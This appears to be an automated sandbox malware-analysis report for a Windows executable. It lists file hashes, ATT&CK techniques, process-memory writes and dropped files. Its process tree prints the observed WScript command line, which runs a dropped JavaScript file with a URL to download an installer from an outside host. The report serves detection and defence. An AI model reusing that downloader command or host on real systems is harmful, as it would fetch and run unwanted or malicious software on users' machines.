8dbb272de5e88682edceb0d4066ae77aed9074779a07f69a07638cd9b803c85b

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
25/08/2024, 16:45

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe
Size

184KB
MD5

c128ad843b9b859c80d088dfcc57970e
SHA1

cdb525bda67b9418a61a57d66eef7756ba0c20d8
SHA256

8dbb272de5e88682edceb0d4066ae77aed9074779a07f69a07638cd9b803c85b
SHA512

acdc075bb69513b24ccde9bc8e40e85d783a2addd1c182fba6fa61cdc3a9c29d5b89992800fee4dc7b6ba49e4ca4887d0d27cf9514aebd06d9aab8b695a10016
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3D:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2044	WScript.exe
8	2044	WScript.exe
10	2044	WScript.exe
12	2948	WScript.exe
13	2948	WScript.exe
15	1324	WScript.exe
16	1324	WScript.exe
18	1388	WScript.exe
19	1388	WScript.exe
21	1968	WScript.exe
22	1968	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 2044	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	30
PID 2536 wrote to memory of 2044	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	30
PID 2536 wrote to memory of 2044	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	30
PID 2536 wrote to memory of 2044	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	30
PID 2536 wrote to memory of 2948	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	33
PID 2536 wrote to memory of 2948	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	33
PID 2536 wrote to memory of 2948	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	33
PID 2536 wrote to memory of 2948	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	33
PID 2536 wrote to memory of 1324	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	35
PID 2536 wrote to memory of 1324	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	35
PID 2536 wrote to memory of 1324	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	35
PID 2536 wrote to memory of 1324	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	35
PID 2536 wrote to memory of 1388	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	37
PID 2536 wrote to memory of 1388	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	37
PID 2536 wrote to memory of 1388	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	37
PID 2536 wrote to memory of 1388	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	37
PID 2536 wrote to memory of 1968	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	39
PID 2536 wrote to memory of 1968	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	39
PID 2536 wrote to memory of 1968	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	39
PID 2536 wrote to memory of 1968	2536	c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c128ad843b9b859c80d088dfcc57970e_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB99.js" http://www.djapp.info/?domain=XBaEUPIUGt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCB99.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2044
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB99.js" http://www.djapp.info/?domain=XBaEUPIUGt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCB99.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2948
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB99.js" http://www.djapp.info/?domain=XBaEUPIUGt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCB99.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB99.js" http://www.djapp.info/?domain=XBaEUPIUGt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCB99.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1388
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB99.js" http://www.djapp.info/?domain=XBaEUPIUGt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCB99.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
30f0e9c496ba20354ec00c60eada20bd

SHA1
d45fb470b0d89bfd8a7880b4a5d8b4d24bfdf339

SHA256
793d4e8584f5c0d155df47073c36fa5ca29966b9201d3c0a5998c17475603409

SHA512
03632b4837cf337530a29acfa2bb96aae27c7510297b541ba66b9446ebaff00f68015cc690fc80ac75d1a5035d1e37f6062b77144e8e157d4e7d35be4aa809c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
5dce8bac0098b15876162a60945f3d04

SHA1
a35c9c83219a69238608dd2516f7e27de6f2fb4c

SHA256
5c12a3cc0d4514c3200e27c7171a423db9b7ec30f2370531095e3f3c54b1260f

SHA512
f44b9be44eaf3e6d211a4bf144cb39655ca7d0ca5bcfa2cff3a98092ab299ac1283a49355d2db841ad30363f027392300fda5646b81447e5bc0d7633e48c7da4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\domain_profile[1].htm

Filesize
40KB

MD5
9a5541113d097d3edfc60ab26a65ad3d

SHA1
ad3d36bbd71c6f496818f13d3a676fbb4cacc611

SHA256
d80050f244bad59a310f1e4b7188406754d56d1efc55b4eb12132432b97e05a4

SHA512
6547bb189807d8b9b8f20000abad6ad8176690b6fea96b8c2513c100d5a298d15f9cc95d383670e2d326b9a1e56231fcbce69d8809925cf57c4120cc9633be13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\domain_profile[1].htm

Filesize
40KB

MD5
964e39e880def32b71a414026b15c35a

SHA1
13f3780fd36f53d67e21c4f767f170a7159365a9

SHA256
8d47f38a8b207dd20faf0eeb554fe6c9f73c6e56c47a308abf2af4c6817d6155

SHA512
58d7b2fb9b518d26e54fce442b176220c4c2e3dc10c5a3405c7014f323297d052d0b27acc3a43d76218fc75ffff7f1f1568cd78b06123831eef5bfbb3efde82d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q98GZSGI\domain_profile[1].htm

Filesize
40KB

MD5
d9935c46dbf2c796e7b630107f142757

SHA1
a1d2994f1aba0c64abef93750b92316cd4320438

SHA256
e165fbfebe177af0cc2b4810143854b6789e30bec5b919b6858241b3ad25b3c4

SHA512
f0526e2380229f686d3773a5d7cd0632a02631f045dff7a3837a8e66d47c652f658c17a9c65e63bbe3642999fec9ae7b36e5d6f2cb3b6b6e9ac53302d60b7372

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q98GZSGI\domain_profile[1].htm

Filesize
6KB

MD5
ea39f002d03a051eff746b7f76222fd0

SHA1
ba071c09c51784cf9795228b1044a34262c04770

SHA256
2231665879bbd17f2dd407be25fcdf2587f618bfa799afd1e9622ca60d680c4d

SHA512
710d4142a05dadcdd8d2bb2d47caa27b95e6aadddfd0a55da963eb3d3e450b34c8cea4cbc3b9bb598e480b9b5157bf6d556dcaa9de86b7d6ffae337a65cc3aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab142C.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2BE2.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufCB99.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DDENPA8V.txt

Filesize
175B

MD5
915db6b659bcaf21b480e8b10751f091

SHA1
9cbe4925b3f837afb10826ddacfdd384605782d5

SHA256
09d7bd17c59fc3e87c74f2b61af75984ec5624887a311f40e58f006911306c2c

SHA512
356be7124203501b0a4c5cbb903e51d77c73b2aeeb9df11dce790f18134620fdfaf99735c9e923b6d868af28e5ac132c143db921204162be74a50547641768d5

Download Submit